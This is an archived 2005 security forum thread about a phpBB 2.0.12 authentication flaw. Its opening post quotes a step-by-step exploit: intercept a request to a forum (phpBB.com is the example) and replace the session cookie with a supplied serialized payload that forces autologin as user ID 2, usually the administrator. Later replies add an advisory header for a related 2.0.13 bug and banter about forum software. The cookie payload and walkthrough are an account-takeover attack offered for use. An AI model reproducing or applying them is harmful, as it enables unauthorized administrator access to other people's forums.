Clan x86

Technical (Development, Security, etc.) => General Security Information => Topic started by: Networks on March 25, 2005, 06:30:54 pm

Title: phpBB Bug (Again...)
Post by: Networks on March 25, 2005, 06:30:54 pm

Quote

Ok, now let's get to it. Here is what you will need:
-Preferably a mozilla client, such as Firefox
-LiveHTTP Headers plugin for FireFox Here

Ok, the way this exploit works is because in phpBB's session file, it utilizes a == instead of a === on autocheckid return, allowing you to use a true boolean. I don't know if this was a typo, but to me I think it was a pretty stupid fuck up by phpBB and I am suprised it wasn't found earlier.

Howto:
Go to a forum, for example phpBB.com, open the forum index then go into tools > Live HTTP Headers > then click reload. Once the page is reloaded, go into Live HTTP Headers window, scroll all the way to the top where the first packet is. Then click replay. ScreenShot

In the packet will be thefollowing data
Code:
Host: www.phpbb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D


On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Replace the a%3A0%3A%7B%7D with
Code:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

and then click "reload".

after the page has reloaded you should be logged in a user number 2 , which is usually the administrators id number.

I myself have tried it several times, I have not succeeded in getting an admin status so blah.

Edit: PHPBB 2.0.12 Exploit (That may be why)

Title: Re: phpBB Bug (Again...)
Post by: iago on March 25, 2005, 06:33:08 pm

Eww @ not giving credit :P

------------------------------------------------------------------------
# phpBB 2.0.13 failure to reset user level after failed exploit
# discovered By : tOnk3r
# e-mail : m[at]spywire[dot]net
# date : 22-march-05
# shouts: pureone, spywire.net crew , and everybody i know!
# Versions affected : ALL versions upto and including 2.0.13
# status : vendor notified (phpbb)
------------------------------------------------------------------------

Hoepfully they fix that fast :-o

Title: Re: phpBB Bug (Again...)
Post by: Quik on March 25, 2005, 06:39:55 pm

It's quite rediculous: I've seen so many phpBB exploits on BugTraq mailing list, it's a wonder anyone uses that software.

Title: Re: phpBB Bug (Again...)
Post by: Newby on March 25, 2005, 06:43:37 pm

SMF for life!

Title: Re: phpBB Bug (Again...)
Post by: Networks on March 26, 2005, 01:46:41 am

Quote from: Newby on March 25, 2005, 06:43:37 pm

SMF for life!

Wrong, Invision for life!